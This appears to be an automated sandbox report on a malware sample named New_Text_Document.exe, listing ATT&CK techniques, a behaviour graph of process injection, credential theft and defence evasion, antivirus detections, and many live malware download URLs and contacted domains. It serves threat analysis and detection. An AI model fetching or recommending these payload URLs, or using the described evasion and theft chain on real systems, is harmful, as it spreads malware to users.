                    Source: Yara matchFile source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    File and Directory Permissions Modification
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium14
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Shared Modules
                    11
                    Windows Service
                    11
                    Windows Service
                    21
                    Disable or Modify Tools
                    1
                    Credential API Hooking
                    125
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    712
                    Process Injection
                    11
                    Deobfuscate/Decode Files or Information
                    Security Account Manager651
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration4
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Service Execution
                    Logon Script (Mac)1
                    Scheduled Task/Job
                    4
                    Obfuscated Files or Information
                    NTDS2
                    Process Discovery
                    Distributed Component Object Model1
                    Credential API Hooking
                    Scheduled Transfer125
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script33
                    Software Packing
                    LSA Secrets351
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Timestomp
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Rootkit
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
                    Masquerading
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)351
                    Virtualization/Sandbox Evasion
                    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron712
                    Process Injection
                    Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1332496 Sample: New_Text_Document.exe Startdate: 26/10/2023 Architecture: WINDOWS Score: 100 100 www.yektakhodro.com 2->100 102 www.viteview.com 2->102 104 32 other IPs or domains 2->104 160 Snort IDS alert for network traffic 2->160 162 Multi AV Scanner detection for domain / URL 2->162 164 Found malware configuration 2->164 166 21 other signatures 2->166 12 New_Text_Document.exe 14 16 2->12         started        17 svchost.exe 2->17         started        19 svchost.exe 2->19         started        21 7 other processes 2->21 signatures3 process4 dnsIp5 118 h171145.srv22.test-hf.su 91.227.16.22, 49755, 80 EXIMIUS-ASRU Russian Federation 12->118 120 whitecatcorn.com 8.29.155.210, 443, 49712 NEXCESS-NETUS United States 12->120 124 8 other IPs or domains 12->124 92 C:\Users\user\Desktop\a\tus.exe, PE32 12->92 dropped 94 C:\Users\user\Desktop\a\smss.exe, PE32 12->94 dropped 96 C:\Users\user\Desktop\a\setup.exe, PE32+ 12->96 dropped 98 7 other malicious files 12->98 dropped 198 Drops PE files with benign system names 12->198 23 sbinzx.exe 3 12->23         started        26 autolog.exe 12->26         started        29 audiodgse.exe 3 12->29         started        31 2 other processes 12->31 200 Query firmware table information (likely to detect VMs) 17->200 202 Changes security center settings (notifications, updates, antivirus, firewall) 19->202 122 127.0.0.1 unknown unknown 21->122 file6 signatures7 process8 file9 168 Multi AV Scanner detection for dropped file 23->168 170 Tries to detect virtualization through RDTSC time measurements 23->170 172 Injects a PE file into a foreign processes 23->172 33 sbinzx.exe 23->33         started        36 sbinzx.exe 23->36         started        86 C:\Users\user\AppData\Local\...\pznhcda.exe, PE32 26->86 dropped 174 Antivirus detection for dropped file 26->174 176 Machine Learning detection for dropped file 26->176 38 pznhcda.exe 26->38         started        40 audiodgse.exe 29->40         started        88 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 31->88 dropped 90 C:\Windows\System32\drivers\etc\hosts, ASCII 31->90 dropped 178 Query firmware table information (likely to detect VMs) 31->178 180 Tries to detect sandboxes and other dynamic analysis tools (window names) 31->180 182 Modifies the hosts file 31->182 184 3 other signatures 31->184 signatures10 process11 signatures12 126 Modifies the context of a thread in another process (thread injection) 33->126 128 Maps a DLL or memory area into another process 33->128 130 Sample uses process hollowing technique 33->130 132 Queues an APC in another process (thread injection) 33->132 42 explorer.exe 8 11 33->42 injected 134 Antivirus detection for dropped file 38->134 136 Multi AV Scanner detection for dropped file 38->136 138 Detected unpacking (changes PE section rights) 38->138 140 2 other signatures 38->140 46 pznhcda.exe 38->46         started        48 LkeNkIcFYvnikmw.exe 40->48 injected process13 dnsIp14 112 www.lpqxmz.site 103.120.80.111, 49734, 80 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 42->112 114 collibrishop.online 50.116.112.43, 49723, 80 UNIFIEDLAYER-AS-1US United States 42->114 116 5 other IPs or domains 42->116 186 System process connects to network (likely due to code injection or exploit) 42->186 188 Uses schtasks.exe or at.exe to add and modify task schedules 42->188 190 Adds a directory exclusion to Windows Defender 42->190 50 colorcpl.exe 42->50         started        53 cmd.exe 42->53         started        55 raserver.exe 42->55         started        61 3 other processes 42->61 192 Modifies the context of a thread in another process (thread injection) 46->192 194 Maps a DLL or memory area into another process 46->194 196 Sample uses process hollowing technique 46->196 57 raserver.exe 48->57         started        59 poqexec.exe 48->59         started        signatures15 process16 signatures17 142 Modifies the context of a thread in another process (thread injection) 50->142 144 Maps a DLL or memory area into another process 50->144 146 Tries to detect virtualization through RDTSC time measurements 50->146 63 cmd.exe 50->63         started        148 Uses powercfg.exe to modify the power settings 53->148 150 Modifies power options to not sleep / hibernate 53->150 65 conhost.exe 53->65         started        67 sc.exe 53->67         started        69 sc.exe 53->69         started        78 3 other processes 53->78 71 cmd.exe 55->71         started        152 Tries to steal Mail credentials (via file / registry access) 57->152 154 Tries to harvest and steal browser information (history, passwords, etc) 57->154 156 Writes to foreign memory regions 57->156 158 Injects a PE file into a foreign processes 57->158 73 LkeNkIcFYvnikmw.exe 57->73 injected 76 conhost.exe 61->76         started        80 3 other processes 61->80 process18 dnsIp19 82 conhost.exe 63->82         started        84 conhost.exe 71->84         started        106 parkingpage.namecheap.com 91.195.240.19, 49740, 49742, 49743 SEDO-ASDE Germany 73->106 108 www.lesresort.shop 195.24.68.17, 49735, 49736, 49737 RU-CENTERRU Russian Federation 73->108 110 5 other IPs or domains 73->110 process20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    New_Text_Document.exe50%ReversingLabsByteCode-MSIL.Trojan.FormBook
                    New_Text_Document.exe64%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\user\Desktop\a\autolog.exe100%AviraHEUR/AGEN.1337943
                    C:\Users\user\AppData\Local\Temp\pznhcda.exe100%AviraHEUR/AGEN.1318623
                    C:\Users\user\Desktop\a\kung.exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\Desktop\a\foto1661.exe100%AviraHEUR/AGEN.1318580
                    C:\Users\user\Desktop\a\201.exe100%AviraHEUR/AGEN.1304159
                    C:\Users\user\Desktop\a\audiodgse.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\a\autolog.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\a\tus.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\pznhcda.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\a\davincizx.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\a\kung.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\a\foto1661.exe100%Joe Sandbox ML
                    C:\Program Files\Google\Chrome\updater.exe52%ReversingLabsWin64.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\pznhcda.exe78%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\a\201.exe74%ReversingLabsWin32.Spyware.Lummastealer
                    C:\Users\user\Desktop\a\audiodgse.exe74%ReversingLabsByteCode-MSIL.Trojan.FormBook
                    C:\Users\user\Desktop\a\autolog.exe78%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\a\davincizx.exe17%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\a\kung.exe100%ReversingLabsWin32.Trojan.LokiBot
                    C:\Users\user\Desktop\a\sbinzx.exe22%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\a\setup.exe52%ReversingLabsWin64.Trojan.Generic
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    fletchto99.com0%VirustotalBrowse
                    yektakhodro.com6%VirustotalBrowse
                    img.proxies.world18%VirustotalBrowse
                    www.hotelunivers84.com7%VirustotalBrowse
                    china.dhabigroup.top27%VirustotalBrowse
                    kimgj.com16%VirustotalBrowse
                    shops.myshopify.com0%VirustotalBrowse
                    collibrishop.online11%VirustotalBrowse
                    h171145.srv22.test-hf.su19%VirustotalBrowse
                    www.thwmlohr.click12%VirustotalBrowse
                    www.bradslinkard.com4%VirustotalBrowse
                    whitecatcorn.com8%VirustotalBrowse
                    indococoexports.com7%VirustotalBrowse
                    pathlightpropertiesmgt.com13%VirustotalBrowse
                    butchane.fun13%VirustotalBrowse
                    www.lpqxmz.site10%VirustotalBrowse
                    www.kimgj.com13%VirustotalBrowse
                    www.viteview.com9%VirustotalBrowse
                    fresh1.ironoreprod.top27%VirustotalBrowse
                    www.indococoexports.com4%VirustotalBrowse
                    www.kjnala.shop13%VirustotalBrowse
                    www.vaskaworldairways.com13%VirustotalBrowse
                    www.pathlightpropertiesmgt.com9%VirustotalBrowse
                    www.tcbbuilds.com9%VirustotalBrowse
                    www.yektakhodro.com0%VirustotalBrowse
                    www.peakvitality.fitness11%VirustotalBrowse
                    www.collibrishop.online6%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://dynamic.t0%URL Reputationsafe
                    http://193.42.33.51/simxo.vbs0%Avira URL Cloudsafe
                    http://94.53.120.109/dusers.exe100%Avira URL Cloudmalware
                    http://216.244.203.134:42107/bin.sh100%Avira URL Cloudmalware
                    https://smartphoodapp.com/miner.exe100%Avira URL Cloudmalware
                    http://211.199.69.236:59418/.i100%Avira URL Cloudmalware
                    http://185.161.248.78/3589a2a406ead5ea/msvcp140.dll100%Avira URL Cloudmalware
                    https://smartphoodapp.com/miner.exe17%VirustotalBrowse
                    http://94.53.120.109/dusers.exe15%VirustotalBrowse
                    http://203.204.235.113:44940/.i100%Avira URL Cloudmalware
                    http://193.42.33.51/simxo.vbs11%VirustotalBrowse
                    http://220.117.35.167:47616/.i100%Avira URL Cloudmalware
                    http://116.212.142.69:36319/Mozi.m100%Avira URL Cloudmalware
                    http://211.230.226.111:39603/.i100%Avira URL Cloudmalware
                    http://216.244.203.134:42107/bin.sh6%VirustotalBrowse
                    https://uscreditfixers.com/iupd/0%Avira URL Cloudsafe
                    http://203.204.235.113:44940/.i16%VirustotalBrowse
                    http://185.161.248.78/3589a2a406ead5ea/msvcp140.dll18%VirustotalBrowse
                    http://220.117.35.167:47616/.i19%VirustotalBrowse
                    http://116.212.142.69:36319/Mozi.m22%VirustotalBrowse
                    http://201.150.173.84:53974/Mozi.m100%Avira URL Cloudmalware
                    http://www.leontellez.comReferer:0%Avira URL Cloudsafe
                    http://211.199.69.236:59418/.i19%VirustotalBrowse
                    http://41.32.168.51:16133/.i100%Avira URL Cloudmalware
                    http://109.235.189.104:7992/.i100%Avira URL Cloudmalware
                    http://211.230.226.111:39603/.i16%VirustotalBrowse
                    https://vidaviajesperu.com/download/File_pass1234.7z100%Avira URL Cloudmalware
                    https://wtools.io/code/dl/bPnO100%Avira URL Cloudmalware
                    http://123.241.15.110:56344/.i100%Avira URL Cloudmalware
                    https://uscreditfixers.com/iupd/9%VirustotalBrowse
                    https://wtools.io/code/dl/bPnO17%VirustotalBrowse
                    http://41.32.168.51:16133/.i16%VirustotalBrowse
                    http://98.227.194.36:11110/.i100%Avira URL Cloudmalware
                    http://201.150.173.84:53974/Mozi.m20%VirustotalBrowse
                    https://quizbn.com/download/File_pass1234.7z100%Avira URL Cloudmalware
                    http://61.57.95.40:11177/.i100%Avira URL Cloudmalware
                    http://brknarikan.com/upload/Statement000487291018.xlsb100%Avira URL Cloudmalware
                    http://123.241.15.110:56344/.i12%VirustotalBrowse
                    https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg0%Avira URL Cloudsafe
                    http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-1.exe100%Avira URL Cloudmalware
                    http://98.227.194.36:11110/.i14%VirustotalBrowse
                    https://quizbn.com/download/File_pass1234.7z18%VirustotalBrowse
                    http://176.97.210.211/ppc100%Avira URL Cloudmalware
                    http://109.235.189.104:7992/.i18%VirustotalBrowse
                    https://khanz.co.nz/ieea/100%Avira URL Cloudmalware
                    http://61.57.95.40:11177/.i16%VirustotalBrowse
                    http://122.100.175.200:27429/.i100%Avira URL Cloudmalware
                    http://182.216.221.251:52881/.i100%Avira URL Cloudmalware
                    http://176.97.210.211/ppc19%VirustotalBrowse
                    http://64.79.79.180/m68k100%Avira URL Cloudmalware
                    http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-1.exe19%VirustotalBrowse
                    http://182.235.147.107:22649/.i100%Avira URL Cloudmalware
                    http://182.216.221.251:52881/.i15%VirustotalBrowse
                    https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg3%VirustotalBrowse
                    https://vidaviajesperu.com/download/File_pass1234.7z17%VirustotalBrowse
                    http://62.169.235.215:17145/.i100%Avira URL Cloudmalware
                    http://sterlingfundinginc.com/wp-conte100%Avira URL Cloudmalware
                    http://182.235.147.107:22649/.i15%VirustotalBrowse
                    https://village-auto.net/sut/0%Avira URL Cloudsafe
                    http://64.79.79.180/m68k13%VirustotalBrowse
                    http://103.178.229.177/skyljne.x86_64100%Avira URL Cloudmalware
                    http://112.78.42.90:29620/.i100%Avira URL Cloudmalware
                    http://brknarikan.com/upload/Statement000487291018.xlsb17%VirustotalBrowse
                    http://181.129.137.29:32770/.i100%Avira URL Cloudmalware
                    http://62.169.235.215:17145/.i19%VirustotalBrowse
                    https://village-auto.net/sut/9%VirustotalBrowse
                    http://103.178.229.177/skyljne.x86_644%VirustotalBrowse
                    http://112.239.99.27:37295/Mozi.m100%Avira URL Cloudmalware
                    https://trtmyanmar.com/wp-content/plugins/yjmqxmidki/a/hyehwggs.ps1100%Avira URL Cloudmalware
                    http://122.100.175.200:27429/.i11%VirustotalBrowse
                    http://88.225.222.128:14802/.i100%Avira URL Cloudmalware
                    http://35.230.66.101/hydro.mpsl100%Avira URL Cloudmalware
                    http://112.78.42.90:29620/.i14%VirustotalBrowse
                    http://109.99.116.230:42226/.i100%Avira URL Cloudmalware
                    http://112.239.99.27:37295/Mozi.m6%VirustotalBrowse
                    https://karapinarhaber.com.tr/wp-content/download/File_pass1234.7z100%Avira URL Cloudphishing
                    http://181.129.137.29:32770/.i15%VirustotalBrowse
                    https://trtmyanmar.com/wp-content/plugins/yjmqxmidki/a/hyehwggs.ps111%VirustotalBrowse
                    http://108.2.158.69:36459/.i100%Avira URL Cloudmalware
                    https://khanz.co.nz/ieea/16%VirustotalBrowse
                    http://critlcalriver.com/site-assets/Rules.doc100%Avira URL Cloudmalware
                    http://88.225.222.128:14802/.i15%VirustotalBrowse
                    http://2.202.11.68:48386/.i100%Avira URL Cloudmalware
                    http://45.81.39.10/bins/scorp.mips100%Avira URL Cloudmalware
                    https://pns.org.pk/crt/xe100%Avira URL Cloudmalware
                    http://89.45.182.152:6906/.i100%Avira URL Cloudmalware
                    http://mirometal.com/oi/0%Avira URL Cloudsafe
                    https://rjassociatesindia.com/sitn/0%Avira URL Cloudsafe
                    http://31.220.3.140/bins/la.bot.arm100%Avira URL Cloudmalware
                    https://yogayoga.ie/sga/0%Avira URL Cloudsafe
                    http://90.176.171.4:7682/.i100%Avira URL Cloudmalware
                    http://185.225.74.251/mipsel100%Avira URL Cloudmalware
                    http://123.241.15.46:26319/.i100%Avira URL Cloudmalware
                    http://44.203.122.41/Magic_Stage.ps1100%Avira URL Cloudmalware
                    https://www.movidoc.com.br/agenzia/100%Avira URL Cloudmalware
                    https://sattamatka-no.com/sar/0%Avira URL Cloudsafe
                    http://219.85.163.80:1336/.i100%Avira URL Cloudmalware
                    http://91.213.50.74/GREEN/ZXC/ZAS/PeF3.txt100%Avira URL Cloudmalware
                    http://185.254.37.196/bins/sora.sh4100%Avira URL Cloudmalware
                    http://84.54.50.9:222/PPt-AdobePDFPackageWebster_178950.wsf100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    www.dulcestipicos.madrid
                    217.76.128.47
                    truefalse
                      unknown
                      fletchto99.com
                      71.33.141.248
                      truetrueunknown
                      yektakhodro.com
                      94.130.16.79
                      truefalseunknown
                      img.proxies.world
                      172.67.130.17
                      truefalseunknown
                      www.hotelunivers84.com
                      38.60.119.195
                      truefalseunknown
                      parkingpage.namecheap.com
                      91.195.240.19
                      truefalse
                        high
                        cdn.discordapp.com
                        162.159.129.233
                        truefalse
                          high
                          www.lesresort.shop
                          195.24.68.17
                          truefalse
                            unknown
                            kimgj.com
                            99.83.196.71
                            truetrueunknown
                            shops.myshopify.com
                            23.227.38.74
                            truetrueunknown
                            china.dhabigroup.top
                            172.67.132.61
                            truefalseunknown
                            www.bradslinkard.com
                            192.64.119.8
                            truefalseunknown
                            collibrishop.online
                            50.116.112.43
                            truetrueunknown
                            whitecatcorn.com
                            8.29.155.210
                            truefalseunknown
                            h171145.srv22.test-hf.su
                            91.227.16.22
                            truetrueunknown
                            www.thwmlohr.click
                            43.154.67.170
                            truetrueunknown
                            pathlightpropertiesmgt.com
                            3.33.130.190
                            truetrueunknown
                            indococoexports.com
                            123.100.226.163
                            truefalseunknown
                            butchane.fun
                            104.21.1.169
                            truefalseunknown
                            www.lpqxmz.site
                            103.120.80.111
                            truetrueunknown
                            fresh1.ironoreprod.top
                            172.67.166.168
                            truefalseunknown
                            www.mantap89.online
                            172.67.196.229
                            truefalse
                              unknown
                              www.kimgj.com
                              unknown
                              unknowntrueunknown
                              time.windows.com
                              unknown
                              unknownfalse
                                high
                                www.viteview.com
                                unknown
                                unknowntrueunknown
                                www.indococoexports.com
                                unknown
                                unknowntrueunknown
                                urlhaus.abuse.ch
                                unknown
                                unknownfalse
                                  high
                                  www.collibrishop.online
                                  unknown
                                  unknowntrueunknown
                                  www.peakvitality.fitness
                                  unknown
                                  unknowntrueunknown
                                  www.yektakhodro.com
                                  unknown
                                  unknowntrueunknown
                                  www.kjnala.shop
                                  unknown
                                  unknowntrueunknown
                                  www.vaskaworldairways.com
                                  unknown
                                  unknowntrueunknown
                                  www.pathlightpropertiesmgt.com
                                  unknown
                                  unknowntrueunknown
                                  www.tcbbuilds.com
                                  unknown
                                  unknowntrueunknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://94.53.120.109/dusers.exeNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmptrue
                                  • 15%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://216.244.203.134:42107/bin.shNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 6%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://211.199.69.236:59418/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 19%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://smartphoodapp.com/miner.exeNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 17%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://193.42.33.51/simxo.vbsNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 11%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.161.248.78/3589a2a406ead5ea/msvcp140.dllNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 18%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://203.204.235.113:44940/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 16%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://220.117.35.167:47616/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 19%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://116.212.142.69:36319/Mozi.mNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 22%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://211.230.226.111:39603/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 16%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://cdn.discordapp.com/attachments/1165755308375810254/1166519315495927878/EnGzwNkORZwHTpBAc1.biNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://uscreditfixers.com/iupd/New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 9%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.leontellez.comReferer:explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://201.150.173.84:53974/Mozi.mNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 20%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://41.32.168.51:16133/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 16%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutionsraserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpfalse
                                      high
                                      https://wtools.io/code/dl/bPnONew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 17%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://109.235.189.104:7992/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 18%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://vidaviajesperu.com/download/File_pass1234.7zNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 17%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
